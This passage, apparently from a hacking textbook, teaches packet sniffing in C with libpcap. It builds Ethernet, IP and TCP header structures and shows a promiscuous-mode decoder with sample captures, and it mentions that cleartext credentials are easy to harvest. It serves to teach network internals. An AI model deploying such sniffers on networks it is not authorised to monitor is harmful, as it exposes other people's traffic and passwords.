80 18 05 b4 27 95 00 00 01 01 08 0a 26 ab a0 75 | ....'.......&..u
02 3c 1b 28 41 41 41 41 41 41 41 41 41 41 41 41 | .<.(AAAAAAAAAAAA
41 41 41 41 0d 0a                               | AAAA..
Got a 71 byte packet
45 10 00 47 1e 38 40 00 40 06 46 1e c0 a8 2a 01 | E..G.8@.@.F...*.
c0 a8 2a f9 8b 12 1e d2 ac 14 cf b4 e5 10 6c c9 | ..*...........l.
80 18 05 b4 68 45 00 00 01 01 08 0a 26 ab b6 e7 | ....hE......&...
02 3c 20 ad 66 6a 73 64 61 6c 6b 66 6a 61 73 6b | .< .fjsdalkfjask
66 6a 61 73 64 0d 0a                            | fjasd..
reader@hacking:~/booksrc $

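While this program does capture packets, it isn't reliable and will miss some packets, especially when there is a lot of traffic. Also, it only captures TCP packets; to capture UDP or ICMP packets, an additional raw socket needs to be opened for each of those protocols. Another big problem with raw sockets is that they are notoriously inconsistent between systems. Raw socket code written for Linux most likely won't work on BSD or Solaris. This makes multiplatform programming with raw sockets nearly impossible.

libpcap Sniffer

A standardized programming library called libpcap can be used to smooth out the inconsistencies of raw sockets. The functions in this library still use raw sockets to do their magic, but the library knows how to work correctly with raw sockets on multiple architectures. Both tcpdump and dsniff use libpcap, which allows them to compile with relative ease on any platform. Let's rewrite the raw packet sniffer program using libpcap's functions instead of our own. These functions are quite intuitive, so we will discuss them using the following code listing.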

pcap_sniff.c

#include <pcap.h>
#include "hacking.h"

void pcap_fatal(const char *failed_in, const char *errbuf) {
   printf("Fatal Error in %s: %s\n", failed_in, errbuf);
   exit(1); 
}

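First, pcap.h is included, providing the various structures and definitions used by the pcap functions. I've also written a pcap_fatal() function for displaying fatal errors. The pcap functions use an error buffer to return error and status messages, so this function is designed to display that buffer to the user.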

int main() {
   struct pcap_pkthdr header;
   const u_char *packet;
   char errbuf[PCAP_ERRBUF_SIZE];
   char *device;
   pcap_t *pcap_handle;
   int i;

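The errbuf variable is the error buffer mentioned above; its size comes from a define in pcap.h that is set to 256. The header variable is a pcap_pkthdr structure containing extra capture information about the packet, such as when it was captured and its length. The pcap_handle pointer works similarly to a file descriptor, but it is used to reference a packet-capturing object.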

device = pcap_lookupdev(errbuf);
if(device == NULL)
   pcap_fatal("pcap_lookupdev", errbuf);

printf("Sniffing on device %s\n", device);

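The pcap_lookupdev() function looks for a suitable device to sniff on. The device is returned as a string pointer that references static function memory. For our system, this will always be /dev/eth0, although it will be different on a BSD system. If the function can't find a suitable interface, it returns NULL.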

pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);
if(pcap_handle == NULL)
   pcap_fatal("pcap_open_live", errbuf);

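Similar to the socket function and the file open function, the pcap_open_live() function opens a packet-capturing device and returns a handle to it. The arguments for this function are the device to sniff, the maximum packet size, a promiscuous flag, a timeout value, and a pointer to the error buffer. Since we want to capture in promiscuous mode, the promiscuous flag is set to 1.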

   for(i=0; i < 3; i++) {
      packet = pcap_next(pcap_handle, &header);
      printf("Got a %d byte packet\n", header.len);
      dump(packet, header.len);
   }
   pcap_close(pcap_handle);
}

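Finally, the packet capture loop uses pcap_next() to grab the next packet. This function is passed the pcap_handle and a pointer to a pcap_pkthdr structure, which it fills with the details of the capture. The function returns a pointer to the packet, and the program then prints the packet, taking the length from the capture header. Then pcap_close() closes the capture interface.

When this program is compiled, the pcap library must be linked. This can be done with GCC's -l flag, as shown in the output below. The pcap library has already been installed on this system, so the library and include files are already in standard locations the compiler knows about.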

reader@hacking:~/booksrc $ gcc -o pcap_sniff pcap_sniff.c
/tmp/ccYgieqx.o: In function `main':
pcap_sniff.c:(.text+0x1c8): undefined reference to `pcap_lookupdev'
pcap_sniff.c:(.text+0x233): undefined reference to `pcap_open_live'
pcap_sniff.c:(.text+0x282): undefined reference to `pcap_next'
pcap_sniff.c:(.text+0x2c2): undefined reference to `pcap_close'
collect2: ld returned 1 exit status
reader@hacking:~/booksrc $ gcc -o pcap_sniff pcap_sniff.c -l pcap
reader@hacking:~/booksrc $ ./pcap_sniff
Fatal Error in pcap_lookupdev: no suitable device found
reader@hacking:~/booksrc $ sudo ./pcap_sniff
Sniffing on device eth0
Got a 82 byte packet
00 01 6c eb 1d 50 00 01 29 15 65 b6 08 00 45 10 | ..l..P..).e...E.
00 44 1e 39 40 00 40 06 46 20 c0 a8 2a 01 c0 a8 | .D.9@.@.F ..*...
2a f9 8b 12 1e d2 ac 14 cf c7 e5 10 6c c9 80 18 | *...........l...
05 b4 54 1a 00 00 01 01 08 0a 26 b6 a7 76 02 3c | ..T.......&..v.<
37 1e 74 68 69 73 20 69 73 20 61 20 74 65 73 74 | 7.this is a test
0d 0a                                           | ..
Got a 66 byte packet
00 01 29 15 65 b6 00 01 6c eb 1d 50 08 00 45 00 | ..).e...l..P..E.
00 34 3d 2c 40 00 40 06 27 4d c0 a8 2a f9 c0 a8 | .4=,@.@.'M..*...
2a 01 1e d2 8b 12 e5 10 6c c9 ac 14 cf d7 80 10 | *.......l.......
05 a8 2b 3f 00 00 01 01 08 0a 02 47 27 6c 26 b6 | ..+?.......G'l&.
a7 76                                           | .v
Got a 84 byte packet
00 01 6c eb 1d 50 00 01 29 15 65 b6 08 00 45 10 | ..l..P..).e...E.
00 46 1e 3a 40 00 40 06 46 1d c0 a8 2a 01 c0 a8 | .F.:@.@.F...*...
2a f9 8b 12 1e d2 ac 14 cf d7 e5 10 6c c9 80 18 | *...........l...
05 b4 11 b3 00 00 01 01 08 0a 26 b6 a9 c8 02 47 | ..........&....G
27 6c 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | 'lAAAAAAAAAAAAAA
41 41 0d 0a                                     | AA..
reader@hacking:~/booksrc $

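Notice that there are many bytes preceding the sample text in the packet, and many of these bytes are similar. Since these are raw packet captures, most of these bytes are layers of header information for Ethernet, IP, and TCP.

Decoding the Layers

In our packet captures, the outermost layer is Ethernet, which is also the lowest visible layer. This layer is used to send data between Ethernet endpoints with MAC addresses. The header for this layer contains the source MAC address, the destination MAC address, and a 16-bit value that describes the type of Ethernet packet. On Linux, the structure for this header is defined in /usr/include/linux/if_ether.h, and the structures for the IP header and TCP header are located in /usr/include/netinet/ip.h and /usr/include/netinet/tcp.h, respectively. The source code for tcpdump also has structures for these headers, or we could just create our own header structures based on the RFCs. A better understanding can be gained from writing our own structures, so let's use the existing structure definitions as guidance to create our own packet header structures to include in hacking-network.h.

First, let's look at the existing definition of the Ethernet header.

From /usr/include/linux/if_ether.h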

#define ETH_ALEN  6   /* Octets in one ethernet addr   */
#define ETH_HLEN  14    /* Total octets in header */

/*
 *  This is an Ethernet frame header.
 */

struct ethhdr {
  unsigned char h_dest[ETH_ALEN]; /* Destination eth addr */
  unsigned char h_source[ETH_ALEN]; /* Source ether addr  */
  __be16    h_proto;    /* Packet type ID field */
} __attribute__((packed));

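This structure contains the three elements of an Ethernet header. The variable declaration of __be16 turns out to be a type definition for a 16-bit unsigned short integer. This can be determined by recursively grepping for the type definition in the include files.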

reader@hacking:~/booksrc $
$ grep -R "typedef.*__be16" /usr/include
/usr/include/linux/types.h:typedef __u16 __bitwise __be16;

$ grep -R "typedef.*__u16" /usr/include | grep short
/usr/include/linux/i2o-dev.h:typedef unsigned short __u16;
/usr/include/linux/cramfs_fs.h:typedef unsigned short __u16;
/usr/include/asm/types.h:typedef unsigned short __u16;
$

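The include file also defines the Ethernet header length, ETH_HLEN, as 14 bytes. This adds up, since the source and destination MAC addresses use 6 bytes each and the packet type field is a 16-bit short integer that takes up 2 bytes. However, many compilers pad structures to 4-byte boundaries for alignment, which means that sizeof(struct ethhdr) may return an incorrect size. To avoid this, ETH_HLEN or a fixed value of 14 bytes should be used for the Ethernet header length.

By including <linux/if_ether.h>, the other include files that contain the required __be16 type definition are pulled in as well. Since we want to make our own structures for hacking-network.h, we should strip out references to unknown type definitions. While we're at it, let's give these fields better names.

Added to hacking-network.h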

#define ETHER_ADDR_LEN 6
#define ETHER_HDR_LEN 14

struct ether_hdr {
  unsigned char ether_dest_addr[ETHER_ADDR_LEN]; // Destination MAC address
  unsigned char ether_src_addr[ETHER_ADDR_LEN];  // Source MAC address
  unsigned short ether_type; // Type of Ethernet packet
};
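
Whether a compiler really lays a structure out like the on-wire header can be checked rather than assumed. The following is a minimal sketch that repeats the ether_hdr definition so it stands alone; the helper name ether_hdr_layout_ok() is made up for this illustration and is not part of hacking-network.h.

```c
#include <stddef.h>  /* offsetof */

#define ETHER_ADDR_LEN 6
#define ETHER_HDR_LEN 14

/* Same fields as the ether_hdr structure above, repeated so this compiles alone. */
struct ether_hdr {
  unsigned char ether_dest_addr[ETHER_ADDR_LEN]; /* Destination MAC address */
  unsigned char ether_src_addr[ETHER_ADDR_LEN];  /* Source MAC address */
  unsigned short ether_type;                     /* Type of Ethernet packet */
};

/* Hypothetical helper: returns 1 if the structure matches the 14-byte
 * on-wire layout (no padding, fields at offsets 0, 6 and 12), 0 otherwise. */
int ether_hdr_layout_ok(void) {
  return sizeof(struct ether_hdr) == ETHER_HDR_LEN
      && offsetof(struct ether_hdr, ether_dest_addr) == 0
      && offsetof(struct ether_hdr, ether_src_addr) == 6
      && offsetof(struct ether_hdr, ether_type) == 12;
}
```

On common x86 compilers this check is expected to pass, since a 2-byte short only needs 2-byte alignment, but using the fixed ETHER_HDR_LEN constant remains the safer habit.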

We can do the same thing with the IP and TCP structures, using the corresponding structures and RFC diagrams as a reference.

From `/usr/include/netinet/ip.h`

struct iphdr
  {
#if __BYTE_ORDER == __LITTLE_ENDIAN
    unsigned int ihl:4;
    unsigned int version:4;
#elif __BYTE_ORDER == __BIG_ENDIAN
    unsigned int version:4;
    unsigned int ihl:4;
#else
# error "Please fix <bits/endian.h>"
#endif
    u_int8_t tos;
    u_int16_t tot_len;
    u_int16_t id;
    u_int16_t frag_off;
    u_int8_t ttl;
    u_int8_t protocol;
    u_int16_t check;
    u_int32_t saddr;
    u_int32_t daddr;
    /*The options start here. */
  };

From RFC 791

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

                    Example Internet Datagram Header

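Each element in the structure corresponds to a field shown in the RFC header diagram. Since the first two fields, Version and IHL (Internet Header Length), are only four bits in size and there aren't any 4-bit variable types in C, the Linux header definition splits the byte differently depending on the byte order of the host. These fields are in network byte order, so on a little-endian host IHL is declared before Version, because bit-fields there are typically allocated starting from the low-order bits. For our purposes, we won't really be using either of these fields, so we don't even need to split up the byte.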

Added to hacking-network.h

struct ip_hdr {
  unsigned char ip_version_and_header_length; // Version and header length
  unsigned char ip_tos;          // Type of service
  unsigned short ip_len;         // Total length
  unsigned short ip_id;          // Identification number
  unsigned short ip_frag_offset; // Fragment offset and flags
  unsigned char ip_ttl;          // Time to live
  unsigned char ip_type;         // Protocol type
  unsigned short ip_checksum;    // Checksum
  unsigned int ip_src_addr;      // Source IP address
  unsigned int ip_dest_addr;     // Destination IP address
};

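As mentioned earlier, compiler padding aligns a structure by padding the rest of it, here to a 4-byte boundary. The fields above already add up to 20 bytes, a multiple of four, so no padding is expected. An IP header without options is always 20 bytes, which is the case the code in this chapter assumes.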
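
Although the chapter's code never needs them, the Version and IHL nibbles can be pulled out of the combined first byte with a shift and a mask instead of bit-fields. This is only a sketch; the helper names ip_version() and ip_header_bytes() are invented for the illustration.

```c
/* Hypothetical helpers: split the first byte of an IPv4 header.
 * Version is the high nibble; IHL is the low nibble. */
unsigned int ip_version(unsigned char version_and_ihl) {
  return version_and_ihl >> 4;
}

/* IHL counts 32-bit words, so multiply by four to get bytes. */
unsigned int ip_header_bytes(unsigned char version_and_ihl) {
  return (version_and_ihl & 0x0f) * 4;
}
```

A typical first byte of 0x45 decodes to version 4 with a 20-byte header. A larger IHL indicates that IP options follow the fixed fields.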

For the TCP packet header, we reference /usr/include/netinet/tcp.h for the structure and RFC 793 for the header diagram.

From `/usr/include/netinet/tcp.h`

typedef u_int32_t tcp_seq;
/*
 * TCP header.
 * Per RFC 793, September, 1981.
 */
struct tcphdr
  {
    u_int16_t th_sport;   /* source port */
    u_int16_t th_dport;   /* destination port */
    tcp_seq th_seq;   /* sequence number */
    tcp_seq th_ack;   /* acknowledgment number */
#  if __BYTE_ORDER == __LITTLE_ENDIAN
    u_int8_t th_x2:4;   /* (unused) */
    u_int8_t th_off:4;    /* data offset */
#  endif
#  if __BYTE_ORDER == __BIG_ENDIAN
    u_int8_t th_off:4;    /* data offset */
    u_int8_t th_x2:4;   /* (unused) */
#  endif
    u_int8_t th_flags;
#  define TH_FIN  0x01
#  define TH_SYN  0x02
#  define TH_RST  0x04
#  define TH_PUSH 0x08
#  define TH_ACK  0x10
#  define TH_URG  0x20
    u_int16_t th_win;   /* window */
    u_int16_t th_sum;   /* checksum */
    u_int16_t th_urp;   /* urgent pointer */
};

From RFC 793

   TCP Header Format

     0                   1                   2                   3
     0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |          Source Port          |       Destination Port        |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                        Sequence Number                        |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                    Acknowledgment Number                      |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |  Data |           |U|A|P|R|S|F|                               |
    | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
    |       |           |G|K|H|T|N|N|                               |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |           Checksum            |         Urgent Pointer        |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                    Options                    |    Padding    |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                             data                              |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 Data Offset: 4 bits
     The number of 32 bit words in the TCP Header.  This indicates where
     the data begins.  The TCP header (even one including options) is an
     integral number of 32 bits long.
 Reserved: 6 bits
     Reserved for future use.  Must be zero.
 Options: variable

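Linux's tcphdr structure also switches the ordering of the 4-bit data offset field and the 4-bit section of the reserved field depending on the host's byte order. The data offset field is important, since it tells the size of the variable-length TCP header. You might have noticed that Linux's tcphdr structure doesn't save any space for TCP options. This is because the RFC defines this field as optional. The size of the TCP header is always 32-bit aligned, and the data offset tells us how many 32-bit words are in the header. So the TCP header size in bytes equals the data offset field from the header times four. Since the data offset field is required to calculate the header size, we'll split the byte containing it, assuming little-endian host byte ordering.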
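
The same calculation can be done without bit-fields, which avoids any assumption about host byte order. In this sketch the helper tcp_header_bytes() is a made-up name; it relies only on the RFC 793 layout shown above, where the data offset is the high nibble of the byte at offset 12.

```c
/* Hypothetical helper: tcp_header points at the first byte of a TCP header.
 * Returns the header size in bytes (data offset times four). */
unsigned int tcp_header_bytes(const unsigned char *tcp_header) {
  unsigned int data_offset = tcp_header[12] >> 4; /* high nibble of byte 12 */
  return data_offset * 4;
}
```

A data offset of 5 means a bare 20-byte header, while a value of 8 means 32 bytes, that is, 12 bytes of options.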

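The th_flags field of Linux's tcphdr structure is defined as an 8-bit unsigned character. The values defined below this field are the bitmasks that correspond to the six possible flags.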

Added to hacking-network.h

struct tcp_hdr {
  unsigned short tcp_src_port;   // Source TCP port
  unsigned short tcp_dest_port;  // Destination TCP port
  unsigned int tcp_seq;          // TCP sequence number
  unsigned int tcp_ack;          // TCP acknowledgment number
  unsigned char reserved:4;      // 4 bits from the 6 bits of reserved space
  unsigned char tcp_offset:4;    // TCP data offset for little-endian host
  unsigned char tcp_flags;       // TCP flags (and 2 bits from reserved space)
#define TCP_FIN   0x01
#define TCP_SYN   0x02
#define TCP_RST   0x04
#define TCP_PUSH  0x08
#define TCP_ACK   0x10
#define TCP_URG   0x20
  unsigned short tcp_window;     // TCP window size
  unsigned short tcp_checksum;   // TCP checksum
  unsigned short tcp_urgent;     // TCP urgent pointer
};
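
The flag bitmasks can be tested one at a time with a bitwise AND. The sketch below repeats the six masks so it compiles alone and collects the names of the set flags into a string; the helper tcp_flags_to_string() is hypothetical and only illustrates the masking.

```c
#include <stdio.h>
#include <string.h>

#define TCP_FIN   0x01
#define TCP_SYN   0x02
#define TCP_RST   0x04
#define TCP_PUSH  0x08
#define TCP_ACK   0x10
#define TCP_URG   0x20

/* Hypothetical helper: writes the space-separated names of the flags set
 * in `flags` into `out`, which holds `size` bytes. */
void tcp_flags_to_string(unsigned char flags, char *out, size_t size) {
  static const struct { unsigned char mask; const char *name; } table[] = {
    {TCP_FIN, "FIN"}, {TCP_SYN, "SYN"}, {TCP_RST, "RST"},
    {TCP_PUSH, "PUSH"}, {TCP_ACK, "ACK"}, {TCP_URG, "URG"}
  };
  size_t i, used = 0;

  if (size == 0)
    return;
  out[0] = '\0';
  for (i = 0; i < sizeof(table) / sizeof(table[0]); i++) {
    if (flags & table[i].mask) {  /* is this bit set? */
      int n = snprintf(out + used, size - used, "%s%s",
                       used ? " " : "", table[i].name);
      if (n < 0 || (size_t)n >= size - used)
        return;                   /* out of room: stop early */
      used += (size_t)n;
    }
  }
}
```

For example, a flags byte of 0x18 has both the 0x08 and 0x10 bits set, so it names PUSH and ACK.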

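Now that the headers are defined as structures, we can write a program to decode the layered headers of each packet. But before we do, let's talk about libpcap for a moment. This library has a function called pcap_loop(), which is a better way to capture packets than just looping on a pcap_next() call. Very few programs actually use pcap_next(), because it's clumsy and inefficient. The pcap_loop() function uses a callback function. This means pcap_loop() is passed a function pointer, and that function is called every time a packet is captured. The prototype for pcap_loop() is as follows: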

int pcap_loop(pcap_t *handle, int count, pcap_handler callback, u_char *args);

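The first argument is the pcap handle, the next one is a count of how many packets to capture, and the third is a function pointer to the callback function. If the count argument is set to -1, it will loop until the program breaks out of it. The final argument is an optional pointer that will get passed to the callback function. Naturally, the callback function needs to follow a certain prototype, since pcap_loop() must call this function. The callback function can be named whatever you like, but the arguments must be as follows: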

void callback(u_char *args, const struct pcap_pkthdr *cap_header, const u_char *packet);

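The first argument is just the optional argument pointer from the last argument to pcap_loop(). It can be used to pass additional information to the callback function, but we aren't going to be using this. The next two arguments should be familiar from pcap_next(): a pointer to the capture header and a pointer to the packet itself.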
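
The callback pattern itself, including the optional argument pointer, can be seen in isolation with a stand-in loop. Nothing in this sketch is libpcap API: the type packet_callback and the functions fake_capture_loop() and add_up_bytes() are invented purely to show how a user pointer travels through a callback.

```c
#include <stddef.h>

/* Stand-in callback type: a user-argument pointer plus the packet bytes. */
typedef void (*packet_callback)(unsigned char *args,
                                const unsigned char *packet, size_t len);

/* Stand-in for a capture loop: invokes cb once per buffered packet,
 * handing the same args pointer to every call. */
int fake_capture_loop(const unsigned char **packets, const size_t *lengths,
                      int count, packet_callback cb, unsigned char *args) {
  int i;
  for (i = 0; i < count; i++)
    cb(args, packets[i], lengths[i]);
  return 0;
}

/* Example callback: args points at a running byte total owned by the caller. */
void add_up_bytes(unsigned char *args, const unsigned char *packet, size_t len) {
  size_t *total = (size_t *)args;
  (void)packet;  /* contents are not needed for a byte count */
  *total += len;
}
```

The caller passes the address of its own size_t, cast to an unsigned char pointer, as the last argument and reads the total once the loop returns. With pcap_loop() the same idea applies to its u_char *args parameter.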

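The following example code uses pcap_loop() with a callback function to capture packets and our header structures to decode them. The program will be explained as the code is listed.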

decode_sniff.c

#include <pcap.h>
#include <arpa/inet.h>   // inet_ntoa(), ntohs(), ntohl()
#include "hacking.h"
#include "hacking-network.h"

void pcap_fatal(const char *, const char *);
void decode_ethernet(const u_char *);
void decode_ip(const u_char *);
u_int decode_tcp(const u_char *);

void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);

int main() {
   struct pcap_pkthdr cap_header;
   const u_char *packet, *pkt_data;
   char errbuf[PCAP_ERRBUF_SIZE];
   char *device;
   pcap_t *pcap_handle;

   device = pcap_lookupdev(errbuf);
   if(device == NULL)
      pcap_fatal("pcap_lookupdev", errbuf);

   printf("Sniffing on device %s\n", device);

   pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);
   if(pcap_handle == NULL)
      pcap_fatal("pcap_open_live", errbuf);

   pcap_loop(pcap_handle, 3, caught_packet, NULL);

   pcap_close(pcap_handle);
}

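At the beginning of this program, the prototype for the callback function, called caught_packet(), is declared along with several decoding functions. Everything else in main() is basically the same, except that the for loop has been replaced with a single call to pcap_loop(). This function is passed the pcap_handle, told to capture three packets, and pointed to the callback function, caught_packet(). The final argument is NULL, since we don't have any additional data to pass along to caught_packet(). Also, notice that the decode_tcp() function returns a u_int. Since the TCP header length is variable, this function returns the length of the TCP header.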

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char *packet) {
   int tcp_header_length, total_header_size, pkt_data_len;
   u_char *pkt_data;

   printf("==== Got a %d byte packet ====\n", cap_header->len);

   decode_ethernet(packet);
   decode_ip(packet+ETHER_HDR_LEN);
   tcp_header_length = decode_tcp(packet+ETHER_HDR_LEN+sizeof(struct ip_hdr));

   total_header_size = ETHER_HDR_LEN+sizeof(struct ip_hdr)+tcp_header_length;
   pkt_data = (u_char *)packet + total_header_size;  // pkt_data points to the data portion.
   pkt_data_len = cap_header->len - total_header_size;
   if(pkt_data_len > 0) {
      printf("\t\t\t%u bytes of packet data\n", pkt_data_len);
      dump(pkt_data, pkt_data_len);
   } else
      printf("\t\t\tNo Packet Data\n");
}

void pcap_fatal(const char *failed_in, const char *errbuf) {
   printf("Fatal Error in %s: %s\n", failed_in, errbuf);
   exit(1); 
}

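The caught_packet() function gets called whenever pcap_loop() captures a packet. This function uses the header lengths to split the packet up by layers and the decoding functions to print out details of each layer's header.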

void decode_ethernet(const u_char *header_start) {
   int i;
   const struct ether_hdr *ethernet_header;

   ethernet_header = (const struct ether_hdr *)header_start;
   printf("[[  Layer 2 :: Ethernet Header  ]]\n");
   printf("[ Source: %02x", ethernet_header->ether_src_addr[0]);
   for(i=1; i < ETHER_ADDR_LEN; i++)
      printf(":%02x", ethernet_header->ether_src_addr[i]);

   printf("\tDest: %02x", ethernet_header->ether_dest_addr[0]);
   for(i=1; i < ETHER_ADDR_LEN; i++)
      printf(":%02x", ethernet_header->ether_dest_addr[i]);
   printf("\tType: %hu ]\n", ethernet_header->ether_type);
}

void decode_ip(const u_char *header_start) {
   const struct ip_hdr *ip_header;
   struct in_addr addr; // inet_ntoa() takes a struct in_addr, not a bare integer

   ip_header = (const struct ip_hdr *)header_start;
   printf("\t((  Layer 3 ::: IP Header  ))\n");
   addr.s_addr = ip_header->ip_src_addr;
   printf("\t( Source: %s\t", inet_ntoa(addr));
   addr.s_addr = ip_header->ip_dest_addr;
   printf("Dest: %s )\n", inet_ntoa(addr));
   printf("\t( Type: %u\t", (u_int) ip_header->ip_type);
   printf("ID: %hu\tLength: %hu )\n", ntohs(ip_header->ip_id), ntohs(ip_header->ip_len));
}

u_int decode_tcp(const u_char *header_start) {
   u_int header_size;
   const struct tcp_hdr *tcp_header;

   tcp_header = (const struct tcp_hdr *)header_start;
   header_size = 4 * tcp_header->tcp_offset;

   printf("\t\t{{  Layer 4 :::: TCP Header  }}\n");
   printf("\t\t{ Src Port: %hu\t", ntohs(tcp_header->tcp_src_port));
   printf("Dest Port: %hu }\n", ntohs(tcp_header->tcp_dest_port));
   printf("\t\t{ Seq #: %u\t", ntohl(tcp_header->tcp_seq));
   printf("Ack #: %u }\n", ntohl(tcp_header->tcp_ack));
   printf("\t\t{ Header Size: %u\tFlags: ", header_size);
   if(tcp_header->tcp_flags & TCP_FIN)
      printf("FIN ");
   if(tcp_header->tcp_flags & TCP_SYN)
      printf("SYN ");
   if(tcp_header->tcp_flags & TCP_RST)
      printf("RST ");
   if(tcp_header->tcp_flags & TCP_PUSH)
      printf("PUSH ");
   if(tcp_header->tcp_flags & TCP_ACK)
      printf("ACK ");
   if(tcp_header->tcp_flags & TCP_URG)
      printf("URG ");
   printf(" }\n");

   return header_size; 
}

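The decoding functions are passed a pointer to the start of the header, which is typecast to the appropriate structure. This allows accessing the various fields of the header, but it's important to remember that these values are in network byte order. This data is straight from the wire, so the byte order needs to be converted for use on an x86 processor.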
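
The effect of the byte-order conversion is easy to see on a single 16-bit field. This sketch reads two raw bytes as they would appear on the wire and converts them with ntohs(); the helper name read_net_short() is made up for the illustration.

```c
#include <arpa/inet.h>  /* ntohs() */
#include <string.h>     /* memcpy() */

/* Hypothetical helper: read a 16-bit network-order field from packet bytes
 * and return it in host byte order. */
unsigned short read_net_short(const unsigned char *p) {
  unsigned short raw;
  memcpy(&raw, p, sizeof(raw)); /* copying avoids unaligned access */
  return ntohs(raw);            /* network (big-endian) to host order */
}
```

On the wire, port 7890 is the two bytes 0x1e 0xd2. Without ntohs(), an x86 host would read them as 0xd21e, or 53790.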

reader@hacking:~/booksrc $ gcc -o decode_sniff decode_sniff.c -lpcap
reader@hacking:~/booksrc $ sudo ./decode_sniff
Sniffing on device eth0
==== Got a 75 byte packet ====
[[  Layer 2 :: Ethernet Header  ]]
[ Source: 00:01:29:15:65:b6     Dest: 00:01:6c:eb:1d:50 Type: 8 ]
        ((  Layer 3 ::: IP Header  ))
        ( Source: 192.168.42.1  Dest: 192.168.42.249 )
        ( Type: 6       ID: 7755        Length: 61 )
                {{  Layer 4 :::: TCP Header  }}
                { Src Port: 35602       Dest Port: 7890 }
                { Seq #: 2887045274     Ack #: 3843058889 }
                { Header Size: 32       Flags: PUSH ACK  }
                        9 bytes of packet data
74 65 73 74 69 6e 67 0d 0a                      | testing..
==== Got a 66 byte packet ====
[[  Layer 2 :: Ethernet Header  ]]
[ Source: 00:01:6c:eb:1d:50     Dest: 00:01:29:15:65:b6 Type: 8 ]
        ((  Layer 3 ::: IP Header  ))
        ( Source: 192.168.42.249        Dest: 192.168.42.1 )
        ( Type: 6       ID: 15678       Length: 52 )
                {{  Layer 4 :::: TCP Header  }}
                { Src Port: 7890        Dest Port: 35602 }
                { Seq #: 3843058889     Ack #: 2887045283 }
                { Header Size: 32       Flags: ACK  }
                        No Packet Data
==== Got a 82 byte packet ====
[[  Layer 2 :: Ethernet Header  ]]
[ Source: 00:01:29:15:65:b6     Dest: 00:01:6c:eb:1d:50 Type: 8 ]
        ((  Layer 3 ::: IP Header  ))
        ( Source: 192.168.42.1  Dest: 192.168.42.249 )
        ( Type: 6       ID: 7756        Length: 68 )
                {{  Layer 4 :::: TCP Header  }}
                { Src Port: 35602       Dest Port: 7890 }
                { Seq #: 2887045283     Ack #: 3843058889 }
                { Header Size: 32       Flags: PUSH ACK  }
                        16 bytes of packet data
74 68 69 73 20 69 73 20 61 20 74 65 73 74 0d 0a | this is a test..
reader@hacking:~/booksrc $

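With the headers decoded and separated into layers, the TCP/IP connection is much easier to understand. Notice which IP addresses are associated with which MAC address. Also, notice how the sequence number in the two packets from 192.168.42.1 (the first and last packets) increases by nine, since the first packet contained nine bytes of actual data: 2887045283 - 2887045274 = 9. TCP uses this to make sure all of the data arrives in order, since packets could be delayed for various reasons.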
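
The sequence number arithmetic can be written down directly. In this minimal sketch the helper next_seq() is a made-up name; it only covers data bytes, and it relies on unsigned 32-bit arithmetic wrapping modulo 2^32 the same way TCP sequence numbers do.

```c
#include <stdint.h>

/* Hypothetical helper: the sequence number expected on the sender's next
 * segment after payload_len bytes of data. Wraps around at 2^32. */
uint32_t next_seq(uint32_t seq, uint32_t payload_len) {
  return seq + payload_len;
}
```

Starting from 2887045274 with nine bytes of data gives 2887045283, matching the third packet in the capture above. SYN and FIN flags each consume one sequence number as well, which this sketch leaves out.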

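Despite all of the mechanisms built into the packet headers, the packets are still visible to anyone on the same network segment. Protocols such as FTP, POP3, and telnet transmit data without encryption. Even without the assistance of a tool like dsniff, it's fairly trivial for an attacker sniffing the network to find the usernames and passwords in these packets and use them to compromise other systems. From a security perspective, this isn't too good, so more intelligent switches provide switched network environments.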

Active Sniffing

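In a switched network environment, packets are only sent to the port they are destined for, according to their destination MAC addresses. This requires more intelligent hardware that can create and maintain a table associating MAC addresses with certain ports, depending on which device is connected to each port, as illustrated here.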

